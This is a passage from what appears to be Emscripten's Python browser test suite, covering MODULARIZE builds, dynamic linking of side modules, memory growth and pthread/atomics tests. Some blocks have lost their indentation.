if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
let promise = HelloWorld();
if (!promise instanceof Promise) throw new Error('Return value should be a promise');
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
# Even without a mem init file, everything is async
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
HelloWorld({ noInitialRun: true }).then(hello => {
hello._main();
});
'''),
]:
print('test on', opts, args, code)
# this test is synchronous, so avoid async startup due to wasm features
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-s', 'MODULARIZE', '-s', 'SINGLE_FILE'] + args + opts)
create_test_file('a.html', '''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
  def test_modularize_network_error(self):
    # A MODULARIZE build whose .wasm file is deleted before the page loads:
    # the factory promise must reject rather than resolve.
    test_c_path = path_from_root('tests', 'browser_test_hello_world.c')
    browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
    self.compile_btest([test_c_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
    create_test_file('a.html', '''
      <script src="a.out.js"></script>
      <script>
        createModule()
          .then(() => {
            reportResultToServer("Module creation succeeded when it should have failed");
          })
          .catch(err => {
            reportResultToServer(err.message.slice(0, 54));
          });
      </script>
    ''')
    print('Deleting a.out.wasm to cause a download error')
    os.remove('a.out.wasm')
    self.run_browser('a.html', '...', '/report_result?abort(both async and sync fetching of the wasm failed)')
  def test_modularize_init_error(self):
    # An error thrown during module initialization must reject the factory
    # promise (and must not surface as an unhandled rejection).
    test_cpp_path = path_from_root('tests', 'browser', 'test_modularize_init_error.cpp')
    browser_reporting_js_path = path_from_root('tests', 'browser_reporting.js')
    self.compile_btest([test_cpp_path, '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path])
    create_test_file('a.html', '''
      <script src="a.out.js"></script>
      <script>
        if (typeof window === 'object') {
          window.addEventListener('unhandledrejection', function(event) {
            reportResultToServer("Unhandled promise rejection: " + event.reason.message);
          });
        }
        createModule()
          .then(() => {
            reportResultToServer("Module creation succeeded when it should have failed");
          })
          .catch(err => {
            reportResultToServer(err);
          });
      </script>
    ''')
    self.run_browser('a.html', '...', '/report_result?intentional error to test rejection')
  # test illustrating the regression on the modularize feature since commit c5af8f6
  # when compiling with the --preload-file option
  def test_modularize_and_preload_files(self):
    # amount of memory different from the default one that will be allocated for the emscripten heap
    totalMemory = 33554432
    for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
      # the main function simply checks that the amount of allocated heap memory is correct
      create_test_file('test.c', r'''
        #include <stdio.h>
        #include <emscripten.h>
        int main() {
          EM_ASM({
            // use eval here in order for the test with closure compiler enabled to succeed
            var totalMemory = Module['INITIAL_MEMORY'];
            assert(totalMemory === %d, 'bad memory size');
          });
          REPORT_RESULT(0);
          return 0;
        }
      ''' % totalMemory)
      # generate a dummy file
      create_test_file('dummy_file', 'dummy')
      # compile the code with the modularize feature and the preload-file option enabled
      # no wasm, since this tests customizing total memory at runtime
      self.compile_btest(['test.c', '-s', 'WASM=0', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
      create_test_file('a.html', '''
        <script src="a.out.js"></script>
        <script>
          // instantiate the Foo module with custom INITIAL_MEMORY value
          var foo = Foo({ INITIAL_MEMORY: %d });
        </script>
      ''' % totalMemory)
      self.run_browser('a.html', '...', '/report_result?0')
  def test_webidl(self):
    # see original in test_core.py
    # Generates WebIDL glue code, then runs the test at -O0/-O1/-O2.
    self.run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
                      path_from_root('tests', 'webidl', 'test.idl'),
                      'glue'])
    self.assertExists('glue.cpp')
    self.assertExists('glue.js')
    for opts in [[], ['-O1'], ['-O2']]:
      print(opts)
      self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
  @requires_sync_compilation
  def test_dynamic_link(self):
    # Main module dynamically linking a side module, exercised three ways:
    # normally, proxied to a worker, and again normally (auto-preload path).
    create_test_file('pre.js', '''
      Module.dynamicLibraries = ['side.wasm'];
    ''')
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>
      #include <emscripten.h>
      char *side(const char *data);
      int main() {
        char *temp = side("hello through side\n");
        char *ret = (char*)malloc(strlen(temp)+1);
        strcpy(ret, temp);
        temp[1] = 'x';
        EM_ASM({
          Module.realPrint = out;
          out = function(x) {
            if (!Module.printed) Module.printed = x;
            Module.realPrint(x);
          };
        });
        puts(ret);
        EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
        REPORT_RESULT(2);
        return 0;
      }
    ''')
    create_test_file('side.cpp', r'''
      #include <stdlib.h>
      #include <string.h>
      char *side(const char *data);
      char *side(const char *data) {
        char *ret = (char*)malloc(strlen(data)+1);
        strcpy(ret, data);
        return ret;
      }
    ''')
    self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
    self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
    print('wasm in worker (we can read binary data synchronously there)')
    create_test_file('pre.js', '''
      var Module = { dynamicLibraries: ['side.wasm'] };
    ''')
    self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL'])
    self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '--proxy-to-worker', '-s', 'EXPORT_ALL'])
    print('wasm (will auto-preload since no sync binary reading)')
    create_test_file('pre.js', '''
      Module.dynamicLibraries = ['side.wasm'];
    ''')
    # same wasm side module works
    self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
  # verify that dynamic linking works in all kinds of in-browser environments.
  # don't mix different kinds in a single test.
  @parameterized({
    '': ([0],),
    'inworker': ([1],),
  })
  def test_dylink_dso_needed(self, inworker):
    self.emcc_args += ['-O2']
    # --proxy-to-worker only on main
    if inworker:
      self.emcc_args += ['--proxy-to-worker']

    def do_run(src, expected_output):
      # XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests.
      # -> do the assert about expected output inside browser.
      #
      # we have to put the hook into post.js because in main it is too late
      # (in main we won't be able to catch what static constructors inside
      # linked dynlibs printed), and in pre.js it is too early (out is not yet
      # setup by the shell).
      create_test_file('post.js', r'''
          Module.realPrint = out;
          out = function(x) {
            if (!Module.printed) Module.printed = "";
            Module.printed += x + '\n'; // out is passed str without last \n
            Module.realPrint(x);
          };
        ''')
      create_test_file('test_dylink_dso_needed.c', src + r'''
        #include <emscripten/em_asm.h>
        int main() {
          int rtn = test_main();
          EM_ASM({
            var expected = %r;
            assert(Module.printed === expected, ['stdout expected:', expected]);
          });
          return rtn;
        }
      ''' % expected_output)
      self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), 0, args=self.get_emcc_args() + ['--post-js', 'post.js'])

    self._test_dylink_dso_needed(do_run)
  @requires_graphics_hardware
  @requires_sync_compilation
  def test_dynamic_link_glemu(self):
    # LEGACY_GL_EMULATION in the main module must also serve GL calls made
    # from inside a dynamically linked side module.
    create_test_file('pre.js', '''
      Module.dynamicLibraries = ['side.wasm'];
    ''')
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <string.h>
      #include <assert.h>
      const char *side();
      int main() {
        const char *exts = side();
        puts(side());
        assert(strstr(exts, "GL_EXT_texture_env_combine"));
        REPORT_RESULT(1);
        return 0;
      }
    ''')
    create_test_file('side.cpp', r'''
      #include "SDL/SDL.h"
      #include "SDL/SDL_opengl.h"
      const char *side() {
        SDL_Init(SDL_INIT_VIDEO);
        SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
        return (const char *)glGetString(GL_EXTENSIONS);
      }
    ''')
    self.run_process([EMCC, 'side.cpp', '-s', 'SIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL'])
    self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE', '-O2', '-s', 'LEGACY_GL_EMULATION', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL'])
def test_dynamic_link_many(self):
# test asynchronously loading two side modules during startup
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side1.wasm', 'side2.wasm'];
''')
create_test_file('main.c', r'''
int side1();
int side2();
int main() {
return side1() + side2();
}
''')
create_test_file('side1.c', r'''
int side1() { return 1; }
''')
create_test_file('side2.c', r'''
int side2() { return 2; }
''')
self.run_process([EMCC, 'side1.c', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
self.run_process([EMCC, 'side2.c', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
self.btest_exit(self.in_dir('main.c'), '3',
args=['-s', 'MAIN_MODULE', '--pre-js', 'pre.js'])
  def test_dynamic_link_pthread_many(self):
    # Test asynchronously loading two side modules during startup
    # They should always load in the same order
    # Verify that function pointers in the browser's main thread
    # refer to the same function as in a pthread worker.
    # The main thread function table is populated asynchronously
    # in the browser's main thread. However, it should still be
    # populated in the same order as in a pthread worker to
    # guarantee function pointer interop.
    create_test_file('main.cpp', r'''
      #include <thread>
      int side1();
      int side2();
      int main() {
        auto side1_ptr = &side1;
        auto side2_ptr = &side2;
        // Don't join the thread since this is running in the
        // browser's main thread.
        std::thread([=]{
          REPORT_RESULT(int(
            side1_ptr == &side1 &&
            side2_ptr == &side2
          ));
        }).detach();
        return 0;
      }
    ''')
    # The browser will try to load side1 first.
    # Use a big payload in side1 so that it takes longer to load than side2
    create_test_file('side1.cpp', r'''
      char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''";
      int side1() { return 1; }
    ''')
    create_test_file('side2.cpp', r'''
      char const * payload2 = "0";
      int side2() { return 2; }
    ''')
    self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side1.wasm'])
    self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-s', 'SIDE_MODULE', '-o', 'side2.wasm'])
    self.btest(self.in_dir('main.cpp'), '1',
               args=['-Wno-experimental', '-pthread', '-s', 'MAIN_MODULE',
                     '-s', 'RUNTIME_LINKED_LIBS=["side1.wasm","side2.wasm"]'])
  def test_memory_growth_during_startup(self):
    # Preloading a 30MB file into a 16MB heap forces memory growth at startup.
    create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
    self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
  # pthreads tests

  # Helper: writes an html shell that hides SharedArrayBuffer/Atomics, to
  # simulate a browser without shared memory support.
  def prep_no_SAB(self):
    create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
      <script>
        SharedArrayBuffer = undefined;
        Atomics = undefined;
      </script>
    '''))
  @requires_threads
  def test_pthread_c11_threads(self):
    # C11 <threads.h> API on top of pthreads.
    # NOTE(review): uses legacy 'TOTAL_MEMORY' spelling and lowercase 'mb',
    # unlike the 'INITIAL_MEMORY=64MB' used by sibling tests.
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_c11_threads.c'),
               expected='0',
               args=['-g4', '-std=gnu11', '-xc', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'TOTAL_MEMORY=64mb'])
  # Test that the emscripten_ atomics api functions work.
  @parameterized({
    'normal': ([],),
    'closure': (['--closure', '1'],),
  })
  @requires_threads
  def test_pthread_atomics(self, args=[]):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-g1'] + args)
  # Test 64-bit atomics.
  @requires_threads
  def test_pthread_64bit_atomics(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads)
  # Test c++ std::thread::hardware_concurrency()
  @requires_threads
  def test_pthread_hardware_concurrency(self):
    # PTHREAD_POOL_SIZE can be a JS expression, evaluated at runtime.
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_hardware_concurrency.cpp'), expected='0', args=['-O2', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE="navigator.hardwareConcurrency"'])
  # Blocking on the browser's main thread (join/wait) under the various
  # ALLOW_BLOCKING_ON_MAIN_THREAD / PROXY_TO_PTHREAD combinations.
  @parameterized({
    'join': ('join',),
    'wait': ('wait',),
  })
  @requires_threads
  def test_pthread_main_thread_blocking(self, name):
    print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD')
    self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
    if name == 'join':
      print('Test that by default we just warn about blocking on the main thread.')
      self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
      print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD')
      self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
      print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool')
      self.btest(path_from_root('tests', 'pthread', 'main_thread_join.cpp'), expected='2', args=['-O3', '-s', 'USE_PTHREADS', '-g', '-DTRY_JOIN', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
      print('Test that everything works ok when we are on a pthread.')
      self.btest(path_from_root('tests', 'pthread', 'main_thread_%s.cpp' % name), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'PROXY_TO_PTHREAD', '-s', 'ALLOW_BLOCKING_ON_MAIN_THREAD=0'])
  # Test the old GCC atomic __sync_fetch_and_op builtin operations.
  @no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
  @requires_threads
  def test_pthread_gcc_atomic_fetch_and_op(self):
    # Cross every optimization level with debug info on/off.
    for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]:
      for debug in [[], ['-g']]:
        args = opt + debug
        print(args)
        self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
  # 64 bit version of the above test.
  @no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
  @requires_threads
  def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
  # Test the old GCC atomic __sync_op_and_fetch builtin operations.
  @no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
  @requires_threads
  def test_pthread_gcc_atomic_op_and_fetch(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
  # 64 bit version of the above test.
  @no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
  @requires_threads
  def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
  # Tests the rest of the remaining GCC atomics after the two above tests.
  @no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
  @requires_threads
  def test_pthread_gcc_atomics(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
  # Test the __sync_lock_test_and_set and __sync_lock_release primitives.
  @requires_threads
  def test_pthread_gcc_spinlock(self):
    # Run with both the GCC builtins and the emscripten intrinsics variants.
    for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
      self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
  # Test that basic thread creation works.
  @no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
  @requires_threads
  def test_pthread_create(self):
    def test(args):
      print(args)
      self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'),
                 expected='0',
                 args=['-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + args,
                 extra_tries=0) # this should be 100% deterministic
      print() # new line
    test([])
    test(['-O3'])
    # TODO: re-enable minimal runtime once the flakiness is figure out,
    # https://github.com/emscripten-core/emscripten/issues/12368
    # test(['-s', 'MINIMAL_RUNTIME'])
# Test that preallocating worker threads work.
@requires_threads
def test_pthread_preallocates_workers(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_preallocates_workers.cpp'), expected='0', args=['-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=4', '-s', 'PTHREAD_POOL_DELAY_LOAD'])
# Test that allocating a lot of threads doesn't regress. This needs to be checked manually!
@requires_threads
def test_pthread_large_pthread_allocation(self):
self.btest(path_from_root('tests', 'pthread', 'test_large_pthread_allocation.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=128MB', '-O3', '-s', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.')
  # Tests the -s PROXY_TO_PTHREAD=1 option.
  @requires_threads
  def test_pthread_proxy_to_pthread(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
  # Test that a pthread can spawn another pthread of its own.
  @requires_threads
  def test_pthread_create_pthread(self):
    # Also run under MODULARIZE with a custom shell, to cover that combination.
    for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
      self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
  # Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
  @requires_threads
  def test_pthread_nested_spawns(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
  # Test that main thread can wait for a pthread to finish via pthread_join().
  @requires_threads
  def test_pthread_join(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
  # Test that threads can rejoin the pool once detached and finished
  @requires_threads
  def test_std_thread_detach(self):
    self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-s', 'USE_PTHREADS'])
  # Test pthread_cancel() operation
  @requires_threads
  def test_pthread_cancel(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
  # Test pthread_kill() operation
  @no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
  @requires_threads
  def test_pthread_kill(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
  # Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
  @requires_threads
  def test_pthread_cleanup(self):
    self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
  # Tests the pthread mutex api.
  @requires_threads
  def test_pthread_mutex(self):
    # Run both the mutex and the spinlock variants of the test.
    for arg in [[], ['-DSPINLOCK_TEST']]:
      self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'INITIAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@no_firefox('https://bugzilla.mozilla.org/show_bug.cgi?id=1666568')
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '--closure', '1', '-s', 'ENVIRONMENT=web,worker'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(path_from_root('tests', 'unistd', 'io.c'), 0, args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(path_from_root('tests', 'pthread', 'test_pthread_dispatch_after_exit.c'), 0, args=['-s', 'USE_PTHREADS'])
  # Test the operation of Module.pthreadMainPrefixURL variable
  @no_wasm_backend('uses js')
  @requires_threads
  def test_pthread_custom_pthread_main_url(self):
    # The worker JS will be served from a separate 'cdn' directory to verify
    # that locateFile() redirection is actually exercised.
    ensure_dir('cdn')
    # Minimal program: spawn one thread that atomically flips `result`, or set
    # result directly when threading is unsupported; either way report 1.
    create_test_file('main.cpp', r'''
      #include <stdio.h>
      #include <string.h>
      #include <emscripten/emscripten.h>
      #include <emscripten/threading.h>
      #include <pthread.h>
      int result = 0;
      void *thread_main(void *arg) {
        emscripten_atomic_store_u32(&result, 1);
        pthread_exit(0);
      }
      int main() {
        pthread_t t;
        if (emscripten_has_threading_support()) {
          pthread_create(&t, 0, thread_main, 0);
          pthread_join(t, 0);
        } else {
          result = 1;
        }
        REPORT_RESULT(result);
      }
    ''')
    # Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
    # Inject a locateFile that serves .wasm files normally but redirects
    # everything else (i.e. the worker JS / mem file) to cdn/.
    create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
    self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
    # Move the worker JS (and copy the mem file) into cdn/ so only the
    # redirected paths can succeed.
    shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
    shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
    self.run_browser('test.html', '', '/report_result?1')
    # Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
    create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
